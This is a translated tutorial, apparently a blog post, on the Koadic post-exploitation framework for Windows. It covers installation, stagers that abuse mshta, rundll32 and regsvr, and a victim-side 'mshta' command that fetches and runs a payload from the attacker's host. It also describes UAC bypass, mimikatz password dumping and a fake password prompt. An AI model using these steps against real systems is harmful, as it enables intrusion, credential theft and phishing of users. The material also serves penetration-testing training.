Koadic - like Empire, only without powershell

  • Tutorial


In this text, we will talk about the Koadic framework, designed for post-operation in the Windows family of all generations, since it does not require powershell in the system for its work.

Installation and architecture


Clone the official repository from GitHub.

git clone https://github.com/zerosum0x0/koadic.git

After installation, run koadic and get to the menu.



By the structure and principle of operation, koadic is very similar to Powershell Empire .

First, the victim is required to perform some action so that we get a session.
Next, a module is used to overcome User Acces Control (UAC) protection and after that other modules are launched.

In this way, Koadic modules can be divided into Stagers and Implants. In the screenshot above, you can see that in my version there are 4 stagers (a method of delivering implants) and 29 implants themselves, which are modules that “do something useful”.

At startup, the default stager / js / mshta is selected. This module will not write anything to disk and uses .hta scripts and, accordingly, the MSHTA.exe process to launch implants.

There are other stagers, for example, stager / js / rundll32_js, which uses, as the name rundll32.exe replaces, instead of mshta.exe.

As for implants, here we have a fairly large selection.

In addition to overcoming UAC modules, we also have modules that allow you to read the contents of the clipboard, dump SAM and NTDS, run mimikatz , of course, execute commands in CMD, scan hosts on the network for open ports, and more.

A complete list of stagers and implants can be found on the official website .

Examples of using


After starting, you can run the help command and get such a list.



To see the parameters of the current module, you need to run the info command.



If something doesn’t suit us, you can set the parameter using the set



command. Run the stager command.



Next, the victim must execute the command

mshta http://192.168.1.3:1234/BFIER


For demonstration, I chose the old Windows 2000 (IP 192.168.1.7).
After running the command, I get a session in Koadic.



When executing the same command on russified Windows 7 (IP 192.168.2.2), I received an ASCII conversion error, probably due to Russian characters.



The zombie team gets a list of hosts available for post-operation.



To get more detailed information, add the ID to the command.



Since this is Windows 2000, we do not need to use modules to overcome UAC. So just try to execute an operating system command through our Koadic session.



The team worked correctly.

Let's try another stager, for example stager / js / regsvr on English-language Windows 7



After executing the specified command, we get a session in Koadic, and then we can use the module to overcome UAC protection.



Then you can use it, for example, mimikatz



And we got user passwords.

There are more “creative” implants, for example implant / phish / password_box, which shows the user a window with arbitrary text and asks for a password.



And we get a message in Koadic



Of course, all the modules of the framework work flawlessly, but, nevertheless, it can be used as an alternative to Empire, if the situation requires it, and replace the inactive modules with a series of operating system commands that are available to us through the Koadic working modules.

Also popular now: